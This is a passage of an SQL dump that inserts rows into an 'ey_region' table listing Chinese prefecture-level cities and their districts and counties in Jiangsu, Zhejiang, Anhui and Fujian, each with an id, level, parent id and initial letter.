INSERT INTO `ey_region` VALUES ('11542', '启东市', '3', '11482', 'Q');
INSERT INTO `ey_region` VALUES ('11568', '如皋市', '3', '11482', 'R');
INSERT INTO `ey_region` VALUES ('11600', '通州市', '3', '11482', 'T');
INSERT INTO `ey_region` VALUES ('11627', '海门市', '3', '11482', 'H');
INSERT INTO `ey_region` VALUES ('11663', '连云港市', '2', '10808', 'L');
INSERT INTO `ey_region` VALUES ('11664', '市辖区', '3', '11663', 'S');
INSERT INTO `ey_region` VALUES ('11665', '连云区', '3', '11663', 'L');
INSERT INTO `ey_region` VALUES ('11678', '新浦区', '3', '11663', 'X');
INSERT INTO `ey_region` VALUES ('11692', '海州区', '3', '11663', 'H');
INSERT INTO `ey_region` VALUES ('11699', '赣榆县', '3', '11663', 'G');
INSERT INTO `ey_region` VALUES ('11722', '东海县', '3', '11663', 'D');
INSERT INTO `ey_region` VALUES ('11747', '灌云县', '3', '11663', 'G');
INSERT INTO `ey_region` VALUES ('11771', '灌南县', '3', '11663', 'G');
INSERT INTO `ey_region` VALUES ('11786', '淮安市', '2', '10808', 'H');
INSERT INTO `ey_region` VALUES ('11787', '市辖区', '3', '11786', 'S');
INSERT INTO `ey_region` VALUES ('11788', '清河区', '3', '11786', 'Q');
INSERT INTO `ey_region` VALUES ('11801', '楚州区', '3', '11786', 'C');
INSERT INTO `ey_region` VALUES ('11830', '淮阴区', '3', '11786', 'H');
INSERT INTO `ey_region` VALUES ('11853', '清浦区', '3', '11786', 'Q');
INSERT INTO `ey_region` VALUES ('11863', '涟水县', '3', '11786', 'L');
INSERT INTO `ey_region` VALUES ('11896', '洪泽县', '3', '11786', 'H');
INSERT INTO `ey_region` VALUES ('11909', '盱眙县', '3', '11786', 'X');
INSERT INTO `ey_region` VALUES ('11931', '金湖县', '3', '11786', 'J');
INSERT INTO `ey_region` VALUES ('11947', '盐城市', '2', '10808', 'Y');
INSERT INTO `ey_region` VALUES ('11948', '市辖区', '3', '11947', 'S');
INSERT INTO `ey_region` VALUES ('11949', '亭湖区', '3', '11947', 'T');
INSERT INTO `ey_region` VALUES ('11967', '盐都区', '3', '11947', 'Y');
INSERT INTO `ey_region` VALUES ('11982', '响水县', '3', '11947', 'X');
INSERT INTO `ey_region` VALUES ('11998', '滨海县', '3', '11947', 'B');
INSERT INTO `ey_region` VALUES ('12017', '阜宁县', '3', '11947', 'F');
INSERT INTO `ey_region` VALUES ('12040', '射阳县', '3', '11947', 'S');
INSERT INTO `ey_region` VALUES ('12066', '建湖县', '3', '11947', 'J');
INSERT INTO `ey_region` VALUES ('12083', '东台市', '3', '11947', 'D');
INSERT INTO `ey_region` VALUES ('12117', '大丰市', '3', '11947', 'D');
INSERT INTO `ey_region` VALUES ('12135', '扬州市', '2', '10808', 'Y');
INSERT INTO `ey_region` VALUES ('12136', '市辖区', '3', '12135', 'S');
INSERT INTO `ey_region` VALUES ('12137', '广陵区', '3', '12135', 'G');
INSERT INTO `ey_region` VALUES ('12144', '邗江区', '3', '12135', 'H');
INSERT INTO `ey_region` VALUES ('12160', '维扬区', '3', '12135', 'W');
INSERT INTO `ey_region` VALUES ('12175', '宝应县', '3', '12135', 'B');
INSERT INTO `ey_region` VALUES ('12191', '仪征市', '3', '12135', 'Y');
INSERT INTO `ey_region` VALUES ('12212', '高邮市', '3', '12135', 'G');
INSERT INTO `ey_region` VALUES ('12235', '江都市', '3', '12135', 'J');
INSERT INTO `ey_region` VALUES ('12249', '镇江市', '2', '10808', 'Z');
INSERT INTO `ey_region` VALUES ('12250', '市区', '3', '12249', 'S');
INSERT INTO `ey_region` VALUES ('12251', '京口区', '3', '12249', 'J');
INSERT INTO `ey_region` VALUES ('12265', '润州区', '3', '12249', 'R');
INSERT INTO `ey_region` VALUES ('12273', '丹徒区', '3', '12249', 'D');
INSERT INTO `ey_region` VALUES ('12282', '丹阳市', '3', '12249', 'D');
INSERT INTO `ey_region` VALUES ('12300', '扬中市', '3', '12249', 'Y');
INSERT INTO `ey_region` VALUES ('12312', '句容市', '3', '12249', 'J');
INSERT INTO `ey_region` VALUES ('12343', '泰州市', '2', '10808', 'T');
INSERT INTO `ey_region` VALUES ('12344', '市辖区', '3', '12343', 'S');
INSERT INTO `ey_region` VALUES ('12345', '海陵区', '3', '12343', 'H');
INSERT INTO `ey_region` VALUES ('12362', '高港区', '3', '12343', 'G');
INSERT INTO `ey_region` VALUES ('12370', '兴化市', '3', '12343', 'X');
INSERT INTO `ey_region` VALUES ('12407', '靖江市', '3', '12343', 'J');
INSERT INTO `ey_region` VALUES ('12423', '泰兴市', '3', '12343', 'T');
INSERT INTO `ey_region` VALUES ('12450', '姜堰市', '3', '12343', 'J');
INSERT INTO `ey_region` VALUES ('12475', '宿迁市', '2', '10808', 'S');
INSERT INTO `ey_region` VALUES ('12476', '市辖区', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12477', '宿城区', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12496', '宿豫区', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12515', '沭阳县', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12551', '泗阳县', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12570', '泗洪县', '3', '12475', 'S');
INSERT INTO `ey_region` VALUES ('12596', '浙江省', '1', '0', 'Z');
INSERT INTO `ey_region` VALUES ('12597', '杭州市', '2', '12596', 'H');
INSERT INTO `ey_region` VALUES ('12598', '市辖区', '3', '12597', 'S');
INSERT INTO `ey_region` VALUES ('12599', '上城区', '3', '12597', 'S');
INSERT INTO `ey_region` VALUES ('12606', '下城区', '3', '12597', 'X');
INSERT INTO `ey_region` VALUES ('12615', '江干区', '3', '12597', 'J');
INSERT INTO `ey_region` VALUES ('12626', '拱墅区', '3', '12597', 'G');
INSERT INTO `ey_region` VALUES ('12637', '西湖区', '3', '12597', 'X');
INSERT INTO `ey_region` VALUES ('12652', '滨江区', '3', '12597', 'B');
INSERT INTO `ey_region` VALUES ('12656', '萧山区', '3', '12597', 'X');
INSERT INTO `ey_region` VALUES ('12685', '余杭区', '3', '12597', 'Y');
INSERT INTO `ey_region` VALUES ('12705', '桐庐县', '3', '12597', 'T');
INSERT INTO `ey_region` VALUES ('12719', '淳安县', '3', '12597', 'C');
INSERT INTO `ey_region` VALUES ('12743', '建德市', '3', '12597', 'J');
INSERT INTO `ey_region` VALUES ('12760', '富阳市', '3', '12597', 'F');
INSERT INTO `ey_region` VALUES ('12786', '临安市', '3', '12597', 'L');
INSERT INTO `ey_region` VALUES ('12813', '宁波市', '2', '12596', 'N');
INSERT INTO `ey_region` VALUES ('12814', '市辖区', '3', '12813', 'S');
INSERT INTO `ey_region` VALUES ('12815', '海曙区', '3', '12813', 'H');
INSERT INTO `ey_region` VALUES ('12824', '江东区', '3', '12813', 'J');
INSERT INTO `ey_region` VALUES ('12832', '江北区', '3', '12813', 'J');
INSERT INTO `ey_region` VALUES ('12841', '北仑区', '3', '12813', 'B');
INSERT INTO `ey_region` VALUES ('12851', '镇海区', '3', '12813', 'Z');
INSERT INTO `ey_region` VALUES ('12858', '鄞州区', '3', '12813', 'Y');
INSERT INTO `ey_region` VALUES ('12881', '象山县', '3', '12813', 'X');
INSERT INTO `ey_region` VALUES ('12900', '宁海县', '3', '12813', 'N');
INSERT INTO `ey_region` VALUES ('12919', '余姚市', '3', '12813', 'Y');
INSERT INTO `ey_region` VALUES ('12941', '慈溪市', '3', '12813', 'C');
INSERT INTO `ey_region` VALUES ('12962', '奉化市', '3', '12813', 'F');
INSERT INTO `ey_region` VALUES ('12974', '温州市', '2', '12596', 'W');
INSERT INTO `ey_region` VALUES ('12975', '市辖区', '3', '12974', 'S');
INSERT INTO `ey_region` VALUES ('12976', '鹿城区', '3', '12974', 'L');
INSERT INTO `ey_region` VALUES ('12998', '龙湾区', '3', '12974', 'L');
INSERT INTO `ey_region` VALUES ('13009', '瓯海区', '3', '12974', 'O');
INSERT INTO `ey_region` VALUES ('13023', '洞头县', '3', '12974', 'D');
INSERT INTO `ey_region` VALUES ('13030', '永嘉县', '3', '12974', 'Y');
INSERT INTO `ey_region` VALUES ('13069', '平阳县', '3', '12974', 'P');
INSERT INTO `ey_region` VALUES ('13101', '苍南县', '3', '12974', 'C');
INSERT INTO `ey_region` VALUES ('13138', '文成县', '3', '12974', 'W');
INSERT INTO `ey_region` VALUES ('13172', '泰顺县', '3', '12974', 'T');
INSERT INTO `ey_region` VALUES ('13209', '瑞安市', '3', '12974', 'R');
INSERT INTO `ey_region` VALUES ('13248', '乐清市', '3', '12974', 'L');
INSERT INTO `ey_region` VALUES ('13280', '嘉兴市', '2', '12596', 'J');
INSERT INTO `ey_region` VALUES ('13281', '市辖区', '3', '13280', 'S');
INSERT INTO `ey_region` VALUES ('13282', '南湖区', '3', '13280', 'N');
INSERT INTO `ey_region` VALUES ('13295', '秀洲区', '3', '13280', 'X');
INSERT INTO `ey_region` VALUES ('13304', '嘉善县', '3', '13280', 'J');
INSERT INTO `ey_region` VALUES ('13316', '海盐县', '3', '13280', 'H');
INSERT INTO `ey_region` VALUES ('13325', '海宁市', '3', '13280', 'H');
INSERT INTO `ey_region` VALUES ('13339', '平湖市', '3', '13280', 'P');
INSERT INTO `ey_region` VALUES ('13350', '桐乡市', '3', '13280', 'T');
INSERT INTO `ey_region` VALUES ('13364', '湖州市', '2', '12596', 'H');
INSERT INTO `ey_region` VALUES ('13365', '市辖区', '3', '13364', 'S');
INSERT INTO `ey_region` VALUES ('13366', '吴兴区', '3', '13364', 'W');
INSERT INTO `ey_region` VALUES ('13382', '南浔区', '3', '13364', 'N');
INSERT INTO `ey_region` VALUES ('13392', '德清县', '3', '13364', 'D');
INSERT INTO `ey_region` VALUES ('13404', '长兴县', '3', '13364', 'C');
INSERT INTO `ey_region` VALUES ('13421', '安吉县', '3', '13364', 'A');
INSERT INTO `ey_region` VALUES ('13437', '绍兴市', '2', '12596', 'S');
INSERT INTO `ey_region` VALUES ('13438', '市辖区', '3', '13437', 'S');
INSERT INTO `ey_region` VALUES ('13439', '越城区', '3', '13437', 'Y');
INSERT INTO `ey_region` VALUES ('13453', '绍兴县', '3', '13437', 'S');
INSERT INTO `ey_region` VALUES ('13473', '新昌县', '3', '13437', 'X');
INSERT INTO `ey_region` VALUES ('13490', '诸暨市', '3', '13437', 'Z');
INSERT INTO `ey_region` VALUES ('13518', '上虞市', '3', '13437', 'S');
INSERT INTO `ey_region` VALUES ('13542', '嵊州市', '3', '13437', 'S');
INSERT INTO `ey_region` VALUES ('13564', '金华市', '2', '12596', 'J');
INSERT INTO `ey_region` VALUES ('13565', '市辖区', '3', '13564', 'S');
INSERT INTO `ey_region` VALUES ('13566', '婺城区', '3', '13564', 'W');
INSERT INTO `ey_region` VALUES ('13594', '金东区', '3', '13564', 'J');
INSERT INTO `ey_region` VALUES ('13606', '武义县', '3', '13564', 'W');
INSERT INTO `ey_region` VALUES ('13625', '浦江县', '3', '13564', 'P');
INSERT INTO `ey_region` VALUES ('13641', '磐安县', '3', '13564', 'P');
INSERT INTO `ey_region` VALUES ('13662', '兰溪市', '3', '13564', 'L');
INSERT INTO `ey_region` VALUES ('13678', '义乌市', '3', '13564', 'Y');
INSERT INTO `ey_region` VALUES ('13692', '东阳市', '3', '13564', 'D');
INSERT INTO `ey_region` VALUES ('13711', '永康市', '3', '13564', 'Y');
INSERT INTO `ey_region` VALUES ('13726', '衢州市', '2', '12596', 'Q');
INSERT INTO `ey_region` VALUES ('13727', '市辖区', '3', '13726', 'S');
INSERT INTO `ey_region` VALUES ('13728', '柯城区', '3', '13726', 'K');
INSERT INTO `ey_region` VALUES ('13746', '衢江区', '3', '13726', 'Q');
INSERT INTO `ey_region` VALUES ('13768', '常山县', '3', '13726', 'C');
INSERT INTO `ey_region` VALUES ('13783', '开化县', '3', '13726', 'K');
INSERT INTO `ey_region` VALUES ('13802', '龙游县', '3', '13726', 'L');
INSERT INTO `ey_region` VALUES ('13818', '江山市', '3', '13726', 'J');
INSERT INTO `ey_region` VALUES ('13840', '舟山市', '2', '12596', 'Z');
INSERT INTO `ey_region` VALUES ('13841', '市辖区', '3', '13840', 'S');
INSERT INTO `ey_region` VALUES ('13842', '定海区', '3', '13840', 'D');
INSERT INTO `ey_region` VALUES ('13859', '普陀区', '3', '13840', 'P');
INSERT INTO `ey_region` VALUES ('13874', '岱山县', '3', '13840', 'D');
INSERT INTO `ey_region` VALUES ('13882', '嵊泗县', '3', '13840', 'S');
INSERT INTO `ey_region` VALUES ('13890', '台州市', '2', '12596', 'T');
INSERT INTO `ey_region` VALUES ('13891', '市辖区', '3', '13890', 'S');
INSERT INTO `ey_region` VALUES ('13892', '椒江区', '3', '13890', 'J');
INSERT INTO `ey_region` VALUES ('13903', '黄岩区', '3', '13890', 'H');
INSERT INTO `ey_region` VALUES ('13923', '路桥区', '3', '13890', 'L');
INSERT INTO `ey_region` VALUES ('13934', '玉环县', '3', '13890', 'Y');
INSERT INTO `ey_region` VALUES ('13944', '三门县', '3', '13890', 'S');
INSERT INTO `ey_region` VALUES ('13959', '天台县', '3', '13890', 'T');
INSERT INTO `ey_region` VALUES ('13975', '仙居县', '3', '13890', 'X');
INSERT INTO `ey_region` VALUES ('13996', '温岭市', '3', '13890', 'W');
INSERT INTO `ey_region` VALUES ('14013', '临海市', '3', '13890', 'L');
INSERT INTO `ey_region` VALUES ('14033', '丽水市', '2', '12596', 'L');
INSERT INTO `ey_region` VALUES ('14034', '市辖区', '3', '14033', 'S');
INSERT INTO `ey_region` VALUES ('14035', '莲都区', '3', '14033', 'L');
INSERT INTO `ey_region` VALUES ('14054', '青田县', '3', '14033', 'Q');
INSERT INTO `ey_region` VALUES ('14086', '缙云县', '3', '14033', 'J');
INSERT INTO `ey_region` VALUES ('14111', '遂昌县', '3', '14033', 'S');
INSERT INTO `ey_region` VALUES ('14132', '松阳县', '3', '14033', 'S');
INSERT INTO `ey_region` VALUES ('14153', '云和县', '3', '14033', 'Y');
INSERT INTO `ey_region` VALUES ('14168', '庆元县', '3', '14033', 'Q');
INSERT INTO `ey_region` VALUES ('14189', '景宁县', '3', '14033', 'J');
INSERT INTO `ey_region` VALUES ('14214', '龙泉市', '3', '14033', 'L');
INSERT INTO `ey_region` VALUES ('14234', '安徽省', '1', '0', 'A');
INSERT INTO `ey_region` VALUES ('14235', '合肥市', '2', '14234', 'H');
INSERT INTO `ey_region` VALUES ('14236', '市辖区', '3', '14235', 'S');
INSERT INTO `ey_region` VALUES ('14237', '瑶海区', '3', '14235', 'Y');
INSERT INTO `ey_region` VALUES ('14254', '庐阳区', '3', '14235', 'L');
INSERT INTO `ey_region` VALUES ('14269', '蜀山区', '3', '14235', 'S');
INSERT INTO `ey_region` VALUES ('14286', '包河区', '3', '14235', 'B');
INSERT INTO `ey_region` VALUES ('14297', '长丰县', '3', '14235', 'C');
INSERT INTO `ey_region` VALUES ('14314', '肥东县', '3', '14235', 'F');
INSERT INTO `ey_region` VALUES ('14334', '肥西县', '3', '14235', 'F');
INSERT INTO `ey_region` VALUES ('14351', '芜湖市', '2', '14234', 'W');
INSERT INTO `ey_region` VALUES ('14352', '市辖区', '3', '14351', 'S');
INSERT INTO `ey_region` VALUES ('14353', '镜湖区', '3', '14351', 'J');
INSERT INTO `ey_region` VALUES ('14366', '弋江区', '3', '14351', 'Y');
INSERT INTO `ey_region` VALUES ('14374', '鸠江区', '3', '14351', 'J');
INSERT INTO `ey_region` VALUES ('14382', '三山区', '3', '14351', 'S');
INSERT INTO `ey_region` VALUES ('14387', '芜湖县', '3', '14351', 'W');
INSERT INTO `ey_region` VALUES ('14394', '繁昌县', '3', '14351', 'F');
INSERT INTO `ey_region` VALUES ('14401', '南陵县', '3', '14351', 'N');
INSERT INTO `ey_region` VALUES ('14410', '蚌埠市', '2', '14234', 'B');
INSERT INTO `ey_region` VALUES ('14411', '市辖区', '3', '14410', 'S');
INSERT INTO `ey_region` VALUES ('14412', '龙子湖区', '3', '14410', 'L');
INSERT INTO `ey_region` VALUES ('14422', '蚌山区', '3', '14410', 'B');
INSERT INTO `ey_region` VALUES ('14434', '禹会区', '3', '14410', 'Y');
INSERT INTO `ey_region` VALUES ('14443', '淮上区', '3', '14410', 'H');
INSERT INTO `ey_region` VALUES ('14449', '怀远县', '3', '14410', 'H');
INSERT INTO `ey_region` VALUES ('14471', '五河县', '3', '14410', 'W');
INSERT INTO `ey_region` VALUES ('14487', '固镇县', '3', '14410', 'G');
INSERT INTO `ey_region` VALUES ('14500', '淮南市', '2', '14234', 'H');
INSERT INTO `ey_region` VALUES ('14501', '市辖区', '3', '14500', 'S');
INSERT INTO `ey_region` VALUES ('14502', '大通区', '3', '14500', 'D');
INSERT INTO `ey_region` VALUES ('14508', '田家庵区', '3', '14500', 'T');
INSERT INTO `ey_region` VALUES ('14523', '谢家集区', '3', '14500', 'X');
INSERT INTO `ey_region` VALUES ('14535', '八公山区', '3', '14500', 'B');
INSERT INTO `ey_region` VALUES ('14542', '潘集区', '3', '14500', 'P');
INSERT INTO `ey_region` VALUES ('14554', '凤台县', '3', '14500', 'F');
INSERT INTO `ey_region` VALUES ('14575', '马鞍山市', '2', '14234', 'M');
INSERT INTO `ey_region` VALUES ('14576', '市辖区', '3', '14575', 'S');
INSERT INTO `ey_region` VALUES ('14577', '金家庄区', '3', '14575', 'J');
INSERT INTO `ey_region` VALUES ('14583', '花山区', '3', '14575', 'H');
INSERT INTO `ey_region` VALUES ('14589', '雨山区', '3', '14575', 'Y');
INSERT INTO `ey_region` VALUES ('14597', '当涂县', '3', '14575', 'D');
INSERT INTO `ey_region` VALUES ('14612', '淮北市', '2', '14234', 'H');
INSERT INTO `ey_region` VALUES ('14613', '市辖区', '3', '14612', 'S');
INSERT INTO `ey_region` VALUES ('14614', '杜集区', '3', '14612', 'D');
INSERT INTO `ey_region` VALUES ('14620', '相山区', '3', '14612', 'X');
INSERT INTO `ey_region` VALUES ('14632', '烈山区', '3', '14612', 'L');
INSERT INTO `ey_region` VALUES ('14641', '濉溪县', '3', '14612', 'S');
INSERT INTO `ey_region` VALUES ('14653', '铜陵市', '2', '14234', 'T');
INSERT INTO `ey_region` VALUES ('14654', '市辖区', '3', '14653', 'S');
INSERT INTO `ey_region` VALUES ('14655', '铜官山区', '3', '14653', 'T');
INSERT INTO `ey_region` VALUES ('14663', '狮子山区', '3', '14653', 'S');
INSERT INTO `ey_region` VALUES ('14671', '铜陵市郊区', '3', '14653', 'T');
INSERT INTO `ey_region` VALUES ('14678', '铜陵县', '3', '14653', 'T');
INSERT INTO `ey_region` VALUES ('14687', '安庆市', '2', '14234', 'A');
INSERT INTO `ey_region` VALUES ('14688', '市辖区', '3', '14687', 'S');
INSERT INTO `ey_region` VALUES ('14689', '迎江区', '3', '14687', 'Y');
INSERT INTO `ey_region` VALUES ('14700', '大观区', '3', '14687', 'D');
INSERT INTO `ey_region` VALUES ('14712', '宜秀区', '3', '14687', 'Y');
INSERT INTO `ey_region` VALUES ('14720', '怀宁县', '3', '14687', 'H');
INSERT INTO `ey_region` VALUES ('14741', '枞阳县', '3', '14687', 'C');
INSERT INTO `ey_region` VALUES ('14764', '潜山县', '3', '14687', 'Q');
INSERT INTO `ey_region` VALUES ('14782', '太湖县', '3', '14687', 'T');
INSERT INTO `ey_region` VALUES ('14798', '宿松县', '3', '14687', 'S');
INSERT INTO `ey_region` VALUES ('14823', '望江县', '3', '14687', 'W');
INSERT INTO `ey_region` VALUES ('14834', '岳西县', '3', '14687', 'Y');
INSERT INTO `ey_region` VALUES ('14859', '桐城市', '3', '14687', 'T');
INSERT INTO `ey_region` VALUES ('14887', '黄山市', '2', '14234', 'H');
INSERT INTO `ey_region` VALUES ('14888', '市辖区', '3', '14887', 'S');
INSERT INTO `ey_region` VALUES ('14889', '屯溪区', '3', '14887', 'T');
INSERT INTO `ey_region` VALUES ('14900', '黄山区', '3', '14887', 'H');
INSERT INTO `ey_region` VALUES ('14917', '徽州区', '3', '14887', 'H');
INSERT INTO `ey_region` VALUES ('14926', '歙县', '3', '14887', 'S');
INSERT INTO `ey_region` VALUES ('14955', '休宁县', '3', '14887', 'X');
INSERT INTO `ey_region` VALUES ('14977', '黟县', '3', '14887', 'Y');
INSERT INTO `ey_region` VALUES ('14986', '祁门县', '3', '14887', 'Q');
INSERT INTO `ey_region` VALUES ('15005', '滁州市', '2', '14234', 'C');
INSERT INTO `ey_region` VALUES ('15006', '市辖区', '3', '15005', 'S');
INSERT INTO `ey_region` VALUES ('15007', '琅琊区', '3', '15005', 'L');
INSERT INTO `ey_region` VALUES ('15016', '南谯区', '3', '15005', 'N');
INSERT INTO `ey_region` VALUES ('15034', '来安县', '3', '15005', 'L');
INSERT INTO `ey_region` VALUES ('15053', '全椒县', '3', '15005', 'Q');
INSERT INTO `ey_region` VALUES ('15071', '定远县', '3', '15005', 'D');
INSERT INTO `ey_region` VALUES ('15109', '凤阳县', '3', '15005', 'F');
INSERT INTO `ey_region` VALUES ('15136', '天长市', '3', '15005', 'T');
INSERT INTO `ey_region` VALUES ('15166', '明光市', '3', '15005', 'M');
INSERT INTO `ey_region` VALUES ('15194', '阜阳市', '2', '14234', 'F');
INSERT INTO `ey_region` VALUES ('15195', '市辖区', '3', '15194', 'S');
INSERT INTO `ey_region` VALUES ('15196', '颍州区', '3', '15194', 'Y');
INSERT INTO `ey_region` VALUES ('15211', '颍东区', '3', '15194', 'Y');
INSERT INTO `ey_region` VALUES ('15224', '颍泉区', '3', '15194', 'Y');
INSERT INTO `ey_region` VALUES ('15231', '临泉县', '3', '15194', 'L');
INSERT INTO `ey_region` VALUES ('15264', '太和县', '3', '15194', 'T');
INSERT INTO `ey_region` VALUES ('15296', '阜南县', '3', '15194', 'F');
INSERT INTO `ey_region` VALUES ('15328', '颍上县', '3', '15194', 'Y');
INSERT INTO `ey_region` VALUES ('15359', '界首市', '3', '15194', 'J');
INSERT INTO `ey_region` VALUES ('15378', '宿州市', '2', '14234', 'S');
INSERT INTO `ey_region` VALUES ('15379', '市辖区', '3', '15378', 'S');
INSERT INTO `ey_region` VALUES ('15380', '墉桥区', '3', '15378', 'Y');
INSERT INTO `ey_region` VALUES ('15417', '砀山县', '3', '15378', 'D');
INSERT INTO `ey_region` VALUES ('15437', '萧县', '3', '15378', 'X');
INSERT INTO `ey_region` VALUES ('15461', '灵璧县', '3', '15378', 'L');
INSERT INTO `ey_region` VALUES ('15482', '泗县', '3', '15378', 'S');
INSERT INTO `ey_region` VALUES ('15499', '巢湖市', '2', '14234', 'C');
INSERT INTO `ey_region` VALUES ('15500', '市辖区', '3', '15499', 'S');
INSERT INTO `ey_region` VALUES ('15501', '居巢区', '3', '15499', 'J');
INSERT INTO `ey_region` VALUES ('15520', '庐江县', '3', '15499', 'L');
INSERT INTO `ey_region` VALUES ('15542', '无为县', '3', '15499', 'W');
INSERT INTO `ey_region` VALUES ('15566', '含山县', '3', '15499', 'H');
INSERT INTO `ey_region` VALUES ('15575', '和县', '3', '15499', 'H');
INSERT INTO `ey_region` VALUES ('15586', '六安市', '2', '14234', 'L');
INSERT INTO `ey_region` VALUES ('15587', '市辖区', '3', '15586', 'S');
INSERT INTO `ey_region` VALUES ('15588', '金安区', '3', '15586', 'J');
INSERT INTO `ey_region` VALUES ('15612', '裕安区', '3', '15586', 'Y');
INSERT INTO `ey_region` VALUES ('15635', '寿县', '3', '15586', 'S');
INSERT INTO `ey_region` VALUES ('15662', '霍邱县', '3', '15586', 'H');
INSERT INTO `ey_region` VALUES ('15698', '舒城县', '3', '15586', 'S');
INSERT INTO `ey_region` VALUES ('15720', '金寨县', '3', '15586', 'J');
INSERT INTO `ey_region` VALUES ('15747', '霍山县', '3', '15586', 'H');
INSERT INTO `ey_region` VALUES ('15764', '亳州市', '2', '14234', 'H');
INSERT INTO `ey_region` VALUES ('15765', '市辖区', '3', '15764', 'S');
INSERT INTO `ey_region` VALUES ('15766', '谯城区', '3', '15764', 'Q');
INSERT INTO `ey_region` VALUES ('15795', '涡阳县', '3', '15764', 'W');
INSERT INTO `ey_region` VALUES ('15823', '蒙城县', '3', '15764', 'M');
INSERT INTO `ey_region` VALUES ('15843', '利辛县', '3', '15764', 'L');
INSERT INTO `ey_region` VALUES ('15871', '池州市', '2', '14234', 'C');
INSERT INTO `ey_region` VALUES ('15872', '市辖区', '3', '15871', 'S');
INSERT INTO `ey_region` VALUES ('15873', '贵池区', '3', '15871', 'G');
INSERT INTO `ey_region` VALUES ('15900', '东至县', '3', '15871', 'D');
INSERT INTO `ey_region` VALUES ('15930', '石台县', '3', '15871', 'S');
INSERT INTO `ey_region` VALUES ('15944', '青阳县', '3', '15871', 'Q');
INSERT INTO `ey_region` VALUES ('15958', '宣城市', '2', '14234', 'X');
INSERT INTO `ey_region` VALUES ('15959', '市辖区', '3', '15958', 'S');
INSERT INTO `ey_region` VALUES ('15960', '宣州区', '3', '15958', 'X');
INSERT INTO `ey_region` VALUES ('15987', '郎溪县', '3', '15958', 'L');
INSERT INTO `ey_region` VALUES ('16001', '广德县', '3', '15958', 'G');
INSERT INTO `ey_region` VALUES ('16013', '泾县', '3', '15958', 'J');
INSERT INTO `ey_region` VALUES ('16025', '绩溪县', '3', '15958', 'J');
INSERT INTO `ey_region` VALUES ('16037', '旌德县', '3', '15958', 'J');
INSERT INTO `ey_region` VALUES ('16048', '宁国市', '3', '15958', 'N');
INSERT INTO `ey_region` VALUES ('16068', '福建省', '1', '0', 'F');
INSERT INTO `ey_region` VALUES ('16069', '福州市', '2', '16068', 'F');
INSERT INTO `ey_region` VALUES ('16070', '市辖区', '3', '16069', 'S');
INSERT INTO `ey_region` VALUES ('16071', '鼓楼区', '3', '16069', 'G');
INSERT INTO `ey_region` VALUES ('16082', '台江区', '3', '16069', 'T');
INSERT INTO `ey_region` VALUES ('16093', '仓山区', '3', '16069', 'C');
INSERT INTO `ey_region` VALUES ('16108', '马尾区', '3', '16069', 'M');
INSERT INTO `ey_region` VALUES ('16113', '晋安区', '3', '16069', 'J');
INSERT INTO `ey_region` VALUES ('16123', '闽侯县', '3', '16069', 'M');
INSERT INTO `ey_region` VALUES ('16140', '连江县', '3', '16069', 'L');
INSERT INTO `ey_region` VALUES ('16164', '罗源县', '3', '16069', 'L');
INSERT INTO `ey_region` VALUES ('16177', '闽清县', '3', '16069', 'M');
INSERT INTO `ey_region` VALUES ('16194', '永泰县', '3', '16069', 'Y');
INSERT INTO `ey_region` VALUES ('16216', '平潭县', '3', '16069', 'P');
INSERT INTO `ey_region` VALUES ('16232', '福清市', '3', '16069', 'F');
INSERT INTO `ey_region` VALUES ('16259', '长乐市', '3', '16069', 'C');
INSERT INTO `ey_region` VALUES ('16278', '厦门市', '2', '16068', 'X');
INSERT INTO `ey_region` VALUES ('16279', '市辖区', '3', '16278', 'S');
INSERT INTO `ey_region` VALUES ('16280', '思明区', '3', '16278', 'S');
INSERT INTO `ey_region` VALUES ('16294', '海沧区', '3', '16278', 'H');
INSERT INTO `ey_region` VALUES ('16303', '湖里区', '3', '16278', 'H');
INSERT INTO `ey_region` VALUES ('16315', '集美区', '3', '16278', 'J');
INSERT INTO `ey_region` VALUES ('16326', '同安区', '3', '16278', 'T');
INSERT INTO `ey_region` VALUES ('16341', '翔安区', '3', '16278', 'X');
INSERT INTO `ey_region` VALUES ('16348', '莆田市', '2', '16068', 'P');
INSERT INTO `ey_region` VALUES ('16349', '市辖区', '3', '16348', 'S');
INSERT INTO `ey_region` VALUES ('16350', '城厢区', '3', '16348', 'C');
INSERT INTO `ey_region` VALUES ('16358', '涵江区', '3', '16348', 'H');
INSERT INTO `ey_region` VALUES ('16372', '荔城区', '3', '16348', 'L');
INSERT INTO `ey_region` VALUES ('16379', '秀屿区', '3', '16348', 'X');
INSERT INTO `ey_region` VALUES ('16393', '仙游县', '3', '16348', 'X');
INSERT INTO `ey_region` VALUES ('16412', '三明市', '2', '16068', 'S');
INSERT INTO `ey_region` VALUES ('16413', '市辖区', '3', '16412', 'S');
INSERT INTO `ey_region` VALUES ('16414', '梅列区', '3', '16412', 'M');
INSERT INTO `ey_region` VALUES ('16421', '三元区', '3', '16412', 'S');
INSERT INTO `ey_region` VALUES ('16430', '明溪县', '3', '16412', 'M');
INSERT INTO `ey_region` VALUES ('16440', '清流县', '3', '16412', 'Q');
INSERT INTO `ey_region` VALUES ('16455', '宁化县', '3', '16412', 'N');
INSERT INTO `ey_region` VALUES ('16472', '大田县', '3', '16412', 'D');
INSERT INTO `ey_region` VALUES ('16492', '尤溪县', '3', '16412', 'Y');
INSERT INTO `ey_region` VALUES ('16508', '沙县', '3', '16412', 'S');
INSERT INTO `ey_region` VALUES ('16521', '将乐县', '3', '16412', 'J');
INSERT INTO `ey_region` VALUES ('16535', '泰宁县', '3', '16412', 'T');
INSERT INTO `ey_region` VALUES ('16545', '建宁县', '3', '16412', 'J');
INSERT INTO `ey_region` VALUES ('16556', '永安市', '3', '16412', 'Y');
INSERT INTO `ey_region` VALUES ('16572', '泉州市', '2', '16068', 'Q');
INSERT INTO `ey_region` VALUES ('16573', '市辖区', '3', '16572', 'S');
INSERT INTO `ey_region` VALUES ('16574', '鲤城区', '3', '16572', 'L');
INSERT INTO `ey_region` VALUES ('16584', '丰泽区', '3', '16572', 'F');
INSERT INTO `ey_region` VALUES ('16593', '洛江区', '3', '16572', 'L');
INSERT INTO `ey_region` VALUES ('16600', '泉港区', '3', '16572', 'Q');
INSERT INTO `ey_region` VALUES ('16608', '惠安县', '3', '16572', 'H');
INSERT INTO `ey_region` VALUES ('16625', '安溪县', '3', '16572', 'A');
INSERT INTO `ey_region` VALUES ('16650', '永春县', '3', '16572', 'Y');
